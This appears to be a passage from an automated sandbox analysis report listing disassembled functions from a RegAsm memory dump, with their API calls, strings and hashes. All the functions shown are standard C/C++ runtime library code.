Instruction ID: 60fae8a6d0401c9fe4353c39c12cf03f1eaf9966b8dd418d38ee2b8e43ff756d
Opcode Fuzzy Hash: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
Instruction Fuzzy Hash: 3EF046362007055FCB149F39DC81B7A7F94FF80328B08842DF9454B680CAB2AC02CA54

Function 0055B578 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00559A51: EnterCriticalSection.KERNEL32(-00173DB0,?,00555902,00000000,005898B0,0000000C,005558CA,?,?,0055D10C,?,?,0055B0E2,00000001,00000364,0041C3C8), ref: 00559A60

EnumSystemLocalesW.KERNEL32(0055B56B,00000001,00589B70,0000000C,0055B943,00000000), ref: 0055B5B0

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
Instruction ID: a1966b68aeed02658dd9d22d9ee8b81625bd5ca2e6ebc5b528a783e4692361ab
Opcode Fuzzy Hash: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
Instruction Fuzzy Hash: FFF03C76A40205DFD704DF58E85AB5D7BA0FB54721F10411BE811A72A0DB758909DF40

Function 00561373 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

EnumSystemLocalesW.KERNEL32(005612CC,00000001,?,?,?,00561B3A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 005613AA

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
Instruction ID: 6fbf1db0d860dfe5b69b60246790b1693fd5e35598fd401bb204bb28dcf0b992
Opcode Fuzzy Hash: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
Instruction Fuzzy Hash: 91F0E53A30024557CB049F39D85567A7F94FFC1710B0A4459EE06CB651D6719842C794

Function 0055BA47 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005579FC,?,20001004,00000000,00000002,?,?,00556FEE), ref: 0055BA7B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
Instruction ID: c060f1b78f71f7eb78c69f107a62cdac8244513631f35d7fac48146e687034f2
Opcode Fuzzy Hash: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
Instruction Fuzzy Hash: 1EE04F35900219BBDF126F60DC1DEAE3F16FF44761F104512FC4566221CB729925AA95

Function 0051CD90 Relevance: 1.5, APIs: 1, Instructions: 15encryptionCOMMONLIBRARYCODE

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000,?,?,0051CE6B,?,?,0051D0F9,?,?,00000000), ref: 0051CDA7

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
Instruction ID: 2a2373d077735e32addf59d9ae9e58c9926abfff3bf8d2f6bc61f1b82ef8659c
Opcode Fuzzy Hash: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
Instruction Fuzzy Hash: 78D05E70544208EBC704CB88E844B69BBB9EB45300F100198E80457350C7725E00EA90

Function 0042C650 Relevance: 1.5, APIs: 1, Instructions: 13timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0042C65A

Part of subcall function 0042C630: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C645

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
Instruction ID: 26212f6dd9c9889740eace36348083d601d478463fc9ebf136614ef56493588f
Opcode Fuzzy Hash: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
Instruction Fuzzy Hash: 0DC012B5C1010CA78E00EBE4BC4A89DBB2C9610115F4006A5ED0983101F935A25D8BD2

Function 0042DCD0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
Instruction ID: cd77543b30515fead899721cfa5598f148643e701e7b6ea9acc9c050cb6a9405
Opcode Fuzzy Hash: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
Instruction Fuzzy Hash: 00E06D74901608EFDB10DFA4E8087A9BBB4FB58301F505A5BEC0493391D3389988EB80

Function 00545A72 Relevance: 72.1, APIs: 11, Strings: 30, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00545AE5
shared_ptr.LIBCMT ref: 00545B2D
shared_ptr.LIBCMT ref: 00545B4C
operator+.LIBVCRUNTIME ref: 00545C7A
DName::operator=.LIBVCRUNTIME ref: 00545C8C
shared_ptr.LIBCMT ref: 00545ED1
DName::operator+.LIBCMT ref: 00545F13
operator+.LIBVCRUNTIME ref: 00545F59

Strings

bool, xrefs: 00545CDE
__int16, xrefs: 00545C3B
__int128, xrefs: 00545CB3
const, xrefs: 00545D7D
volatile, xrefs: 00545D9B
__int64, xrefs: 00545CC6
double, xrefs: 00545B54
dV, xrefs: 00545ECA
decltype(auto), xrefs: 00545E3B
this , xrefs: 00545E59
UNKNOWN, xrefs: 00545EBC
wchar_t, xrefs: 00545E23
int, xrefs: 00545AFF
unsigned , xrefs: 00545EF2
char, xrefs: 00545AD0
long , xrefs: 00545B3A
float, xrefs: 00545B18
char32_t, xrefs: 00545E17
signed , xrefs: 00545BDA
void, xrefs: 00545B75
auto, xrefs: 00545E2F
char8_t, xrefs: 00545DFF
__w64 , xrefs: 00545C68
__int8, xrefs: 00545C47
char16_t, xrefs: 00545E0B
long, xrefs: 00545B0F
short, xrefs: 00545AEF
volatile, xrefs: 00545DBB
<unknown>, xrefs: 00545DEC
__int32, xrefs: 00545CD2

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$dV$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 1464150960-1494216725
Opcode ID: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
Instruction ID: 6d99804e3a8da7d5ea7344fbbeede2e4870af29eb28eb8129b335d5c7abf15d8
Opcode Fuzzy Hash: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
Instruction Fuzzy Hash: F2E139B5C0460ADBCB14DF94C49DAFEBFB8BB04308F20855AE512A7242E7B55B49CF91

Function 00549354 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 0054942A
UnDecorator::getSignedDimension.LIBCMT ref: 00549435
UnDecorator::getSignedDimension.LIBCMT ref: 00549521
UnDecorator::getSignedDimension.LIBCMT ref: 0054953E
UnDecorator::getSignedDimension.LIBCMT ref: 0054955B
DName::operator+.LIBCMT ref: 00549570
UnDecorator::getSignedDimension.LIBCMT ref: 0054958A
_swprintf.LIBCMTD ref: 00549604
DName::operator+.LIBCMT ref: 0054965F

Part of subcall function 00545497: DName::DName.LIBVCRUNTIME ref: 005454F5

DName::DName.LIBVCRUNTIME ref: 005496D6

Strings

nullptr, xrefs: 0054969F
lambda, xrefs: 005496BF
`generic-class-parameter-, xrefs: 0054966B
NULL, xrefs: 005493E8
`template-type-parameter-, xrefs: 0054967B
`generic-method-parameter-, xrefs: 0054963B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 138750261-2441609178
Opcode ID: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
Instruction ID: 79b858ad9252b6762193080c1aa84ee5613355ddb00d8d47f0802fe59c1a2d6a
Opcode Fuzzy Hash: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
Instruction Fuzzy Hash: DC91A5B2D0410A9ACF14EFB4D95FAFF7F78BF9530CF200919E112A6186DA749A058B61

Function 0054885E Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 005488C9
DName::operator+.LIBCMT ref: 00548A0C

Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6

DName::operator+.LIBCMT ref: 005489B7
DName::operator+.LIBCMT ref: 00548A58
DName::operator+.LIBCMT ref: 00548A67
DName::operator+.LIBCMT ref: 00548B93
DName::operator=.LIBVCRUNTIME ref: 00548BD3
DName::DName.LIBVCRUNTIME ref: 00548BDD
DName::operator+.LIBCMT ref: 00548BFA
DName::operator+.LIBCMT ref: 00548C06

Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135

Strings

`anonymous namespace', xrefs: 00548B18

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
String ID: `anonymous namespace'
API String ID: 1043660730-3062148218
Opcode ID: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
Instruction ID: a56167a98a905c46dd22504de9dbf9ed21a87d1f1268e930c8451ea431c80cbe
Opcode Fuzzy Hash: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
Instruction Fuzzy Hash: C9C18BB19002099FDB24DFA4C849BFEBFF4BB5A308F14445DE54AA7281EB749A49CF50

Function 00546CDF Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00546D12

Part of subcall function 005444B8: DName::operator+=.LIBCMT ref: 005444CE

Strings

class , xrefs: 00546E33
struct , xrefs: 00546E3C
union , xrefs: 00546E4C
enum , xrefs: 00546DFF
coclass , xrefs: 00546DE3
cointerface , xrefs: 00546DD3
\V, xrefs: 00546D68, 00546E77, 00546E81, 00546D0D
`unknown ecsu', xrefs: 00546CF4
\V, xrefs: 00546E5E, 00546E66

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+Name::operator+=
String ID: \V$\V$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 382699925-3114403028
Opcode ID: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
Instruction ID: f35742d8d0e59c2c47aff01cf31279159e0d27da270b69ac7e3e9786b4597088
Opcode Fuzzy Hash: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
Instruction Fuzzy Hash: 3D415BB5D0020ADBCF04DFA8D989BEEBFF8BB46308F104519E505A7241D7719A88DB92

Function 005472C9 Relevance: 19.8, APIs: 13, Instructions: 332COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00547392
DName::operator+.LIBCMT ref: 005473CF
DName::DName.LIBVCRUNTIME ref: 005473E3
DName::operator+.LIBCMT ref: 005473F2
DName::operator+.LIBCMT ref: 00547480
DName::DName.LIBVCRUNTIME ref: 005474A8
DName::operator+.LIBCMT ref: 005474B6
DName::operator+.LIBCMT ref: 005474F0
DName::operator+.LIBCMT ref: 00547531
UnDecorator::getReturnType.LIBCMT ref: 00547561
operator+.LIBVCRUNTIME ref: 00547663

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID:
API String ID: 2932655852-0
Opcode ID: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
Instruction ID: 000a7de5a9f062fbf30602ca6b2b18ce2aaaf6586bb93537d5f4f5eeda67c721
Opcode Fuzzy Hash: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
Instruction Fuzzy Hash: 1EC172B1904209AFCF14DFA8D896AFE7FB8FB5D308F100569F506A7291EB309A45DB50

Function 0054A0F8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 185COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 0054A135

Strings

template-parameter-, xrefs: 0054A194
@, xrefs: 0054A2A1
generic-type-, xrefs: 0054A1BB
`generic-type-, xrefs: 0054A1D1
`template-parameter-, xrefs: 0054A1A6

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Replicator::operator[]
String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3433397351
Opcode ID: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
Instruction ID: 65a89cd21b710b857e180ea9b56b32140d1b1376361f3798b4feb2f2ae664960
Opcode Fuzzy Hash: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
Instruction Fuzzy Hash: F261C075D442099FDB00DFA4D849BEEBFB8BF59308F104429EA01B7291DB749909DB91

Function 0054824A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 005482B5
operator+.LIBVCRUNTIME ref: 00548305
shared_ptr.LIBCMT ref: 005483D1
DName::DName.LIBVCRUNTIME ref: 00548401
operator+.LIBVCRUNTIME ref: 00548462

Strings

volatile, xrefs: 005482A7, 005483C3
std::nullptr_t , xrefs: 00548450
std::nullptr_t, xrefs: 00548473
volatile , xrefs: 00548297, 005483B3

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: operator+shared_ptr$NameName::
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2894330373-757766384
Opcode ID: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
Instruction ID: 73f3193a950c44e03eb166a4d69024b4788f275710193067aed13150d85364f4
Opcode Fuzzy Hash: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
Instruction Fuzzy Hash: 1C619A7480410AEECB14DF68CC489FE7FB4FB4970CF048A6AE855AB211DB759645DF90

Function 00548498 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBVCRUNTIME ref: 005484FB
DName::operator+.LIBCMT ref: 005485B9
operator+.LIBVCRUNTIME ref: 005485F8

Strings

void, xrefs: 005484C6
std::nullptr_t , xrefs: 0054854F
cli::array<, xrefs: 00548595
void , xrefs: 005484E5
cli::pin_ptr<, xrefs: 005485CF
std::nullptr_t, xrefs: 0054853F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: operator+$Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 1198235884-2239912363
Opcode ID: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
Instruction ID: 7c7e5bff818a941dcfe79e601a5e8e31d70bfacc444b7772a10236a8f879a01f
Opcode Fuzzy Hash: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
Instruction Fuzzy Hash: AD4111B0904209AFDF10DF94D849BFE7FF5BB05318F048859EA15AB251DBB49A48DF80

Function 00545826 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 005458B4
DName::operator+.LIBCMT ref: 00545907

Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6

Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426

DName::operator+.LIBCMT ref: 005458F8
DName::operator+.LIBCMT ref: 00545958
DName::operator+.LIBCMT ref: 00545965
DName::operator+.LIBCMT ref: 005459AC
DName::operator+.LIBCMT ref: 005459B9

Strings

HV, xrefs: 0054599B, 005459A5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID: HV
API String ID: 1037112749-1037838562
Opcode ID: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
Instruction ID: 108bcb62c00516556a76b7d2b0d91d07d1d1761b4f47007b49a6be26a047f238
Opcode Fuzzy Hash: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
Instruction Fuzzy Hash: 945190B1900619EBDF05DBA4C849FEEBFB8FB48714F144419F602A7181EB349A44CBA0

Function 00566B03 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0056646F), ref: 00566B1C

Strings

pow, xrefs: 00566BBA, 00566C64, 00566CB1
acos, xrefs: 00566C52
exp, xrefs: 00566B9B, 00566C00
sqrt, xrefs: 00566C5B
log, xrefs: 00566B79, 00566B88
asin, xrefs: 00566C49
log10, xrefs: 00566B5E, 00566B6D

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
Instruction ID: 58fc13782c1a2441b6850707650057e27253402340535adaf62e712985e30948
Opcode Fuzzy Hash: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
Instruction Fuzzy Hash: 25517774900E0ADBEB109F68E8881ADBFB4FB49304F104595E4C2A7264CB748E69EB59

Function 00546E89 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00546EFA
DName::operator+.LIBCMT ref: 00546F42
DName::DName.LIBVCRUNTIME ref: 00546F72

Strings

char , xrefs: 00546EBC
short , xrefs: 00546EC5
unsigned , xrefs: 00546F21
int , xrefs: 00546ED5
long , xrefs: 00546EE5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+shared_ptr
String ID: char $int $long $short $unsigned
API String ID: 3919194733-3894466517
Opcode ID: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
Instruction ID: 5dfba9cc13da80164562219bfc48040da0b8cee7c4c7da799e20225a4d46394f
Opcode Fuzzy Hash: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
Instruction Fuzzy Hash: D7212AB4D00249EFCB04CFA8D8997EEBFB4FB06309F008959E461A7295D7B59A48CF51

Function 00540F60 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,0041F86B,00000000,00000000,8341C89B,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 00540FE9
MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,?,00000000,00000000,?,Function_001415D0,00589468,000000FE,?,0041F869), ref: 00541064
SysAllocString.OLEAUT32(00000000), ref: 0054106F
_com_issue_error.COMSUPP ref: 00541098
_com_issue_error.COMSUPP ref: 005410A2
GetLastError.KERNEL32(80070057,8341C89B,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410A7
_com_issue_error.COMSUPP ref: 005410BA
GetLastError.KERNEL32(00000000,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410D0
_com_issue_error.COMSUPP ref: 005410E3

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
Instruction ID: 3273c3d7c6ba730919ae7ead805ef241dc3f2e5e58777b6658a3f02201a3b698
Opcode Fuzzy Hash: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
Instruction Fuzzy Hash: 4B414971A00645ABDB10DF68DC49BEEBFA8FB44758F204239F909E7281D7759884CBA4

Function 005681D0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

__FindPESection.LIBCMT ref: 00568301
VirtualQuery.KERNEL32(83000000,8341C89B,0000001C,8341C89B,?,?,?), ref: 005683E6
__FindPESection.LIBCMT ref: 00568423
__FindPESection.LIBCMT ref: 0056845D

Strings

< Y, xrefs: 00568325
< Y, xrefs: 00568525
< Y, xrefs: 00568472

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FindSection$QueryVirtual
String ID: < Y$< Y$< Y
API String ID: 2992484814-2098822819
Opcode ID: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
Instruction ID: 0c786a70bc05507d8cf3a2c5bdfa6f6d59f7082cdbc7ea77bdd947899ef05769
Opcode Fuzzy Hash: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
Instruction Fuzzy Hash: 43A1B075A00A1A9FCB20CF58D9847BDBBB8FB58720F15076AE819A7391DB31DC45CB90

Function 00549FA4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00549FE8
DName::operator+.LIBCMT ref: 00549FF4

Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6

DName::operator+=.LIBCMT ref: 0054A0B2

Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93

Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426

DName::operator+.LIBCMT ref: 0054A06F

Part of subcall function 00544532: DName::operator=.LIBVCRUNTIME ref: 00544553

DName::DName.LIBVCRUNTIME ref: 0054A0D6
DName::operator+.LIBCMT ref: 0054A0E2

Strings

{for , xrefs: 0054A01B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID: {for
API String ID: 2795783184-864106941
Opcode ID: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
Instruction ID: 3819757beef3ac60148b6cdd210775a5acd7a301e286b7ddf90b1f29eef026ee
Opcode Fuzzy Hash: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
Instruction Fuzzy Hash: A041E4B0A80244AFDF14DFA8C859BEE7FF9BB4A304F404458E289EB281DB749D45CB51

Function 0054560C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005454FF: Replicator::operator[].LIBCMT ref: 0054556B

DName::DName.LIBVCRUNTIME ref: 00545658
DName::operator+.LIBCMT ref: 0054569E

Strings

..., xrefs: 005456CF
void, xrefs: 005456F0
,<ellipsis>, xrefs: 00545689
,..., xrefs: 00545679
<ellipsis>, xrefs: 005456DF

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 583996491-2211150622
Opcode ID: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
Instruction ID: 22717dab220000f2b2fe5b9231030ba8d422ba255fa49f262cc73ca56132a8c7
Opcode Fuzzy Hash: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
Instruction Fuzzy Hash: 2E313A70900609DFCB04DF98C8546EEBFF4FB09308F508559D656EB252E7749A08DF41

Function 00419F50 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00419F62
int.LIBCPMTD ref: 00419F74

Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540

Concurrency::cancel_current_task.LIBCPMTD ref: 00419FBB
std::_Lockit::~_Lockit.LIBCPMT ref: 0041A031

Strings

zA, xrefs: 00419FC8, 00419FDC, 00419FE8, 00419FED, 00419FDF
zA, xrefs: 00419F80, 00419FA6, 00419FA9

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

